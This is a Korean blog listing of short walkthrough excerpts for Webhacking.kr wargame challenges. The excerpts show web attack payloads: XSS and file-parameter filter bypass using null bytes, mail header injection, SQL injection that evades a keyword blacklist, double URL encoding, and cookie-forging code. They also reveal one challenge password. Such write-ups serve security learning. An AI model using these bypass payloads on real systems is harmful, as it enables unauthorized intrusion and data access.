본문 바로가기

분류 전체보기

(119)
Webhacking.kr 23 null byte를 통해 문자열 필터링을 우회 http://webhacking.kr/challenge/bonus/bonus-3/index.php?code=%3Cs%00cr%00ipt%3Ealert(1);%3C/s%00cr%00ipt%3E
Webhacking.kr 47 파라미터 변조를 통한 Mail Header Injection 입력값에 대한 필터링이 이루어지지 안았을 때 개행문자를 이용admin cc: admin@admin.com
Webhacking.kr 25 String 의 끝 Null(%00)을 입력하므로써 문자열 검사 우회 http://webhacking.kr/challenge/bonus/bonus-5/?file=password.php%00 Challenge 25 password is ~~nullbye2~~
Webhacking 42 두개의 파일이 존재하고 down파라미터엔 base64로 인코딩된 파일명이 넘어가므로 1번 파일을 열어보면? http://webhacking.kr/challenge/web/web-20/?down=cmVhZG1lLnR4dA==
Webhacking.kr 27 소스를 보자 if(eregi("#|union|from|challenge|select|\(|\t|/|limit|=|0x",$_GET[no])) exit("no hack"); $q=@mysql_fetch_array(mysql_query("select id from challenge27_table where id='guest' and no=($_GET[no])")) or die("query error"); select id from challenge27_table where id='guest' and no=1||id=admin
Webhacking.kr 26 Webhacking.kr 26 urlencode - Percent Encode에 대한 이해가 필요하다. admin에 해당하는 Percent Encode를 입력하면 바로 풀린다. admin = %25%36%31%25%36%34%25%36%64%25%36%39%25%36%65 http://webhacking.kr/challenge/web/web-11/index.php?id=%2561%2564%256d%2569%256e
Webhacking.kr 54 function run(){ if(window.ActiveXObject){ try { return new ActiveXObject('Msxml2.XMLHTTP'); } catch (e) { try { return new ActiveXObject('Microsoft.XMLHTTP'); } catch (e) { return null; } } }else if(window.XMLHttpRequest){ return new XMLHttpRequest(); }else{ return null; } } x=run(); function answer(i){x.open('GET','?m='+i,false);x.send(null);aview.innerHTML+=x.responseText; // Text가 지워지지 않게 수정i..
Webhacking.kr 6 if(!$_COOKIE[user]) {     $val_id="admin"; //guest에서 변경     $val_pw="123qwe";     for($i=0;$i    {         $val_id=base64_encode($val_id);         $val_pw=base64_encode($val_pw);     }     $val_id=str_replace("1","!",$val_id);     $val_id=str_replace("2","@",$val_id);     $val_id=str_replace("3","$",$val_id);     $val_id=str_replace("4","^",$val_id);     $val_id=str_replace("5","&",$val_id);    ..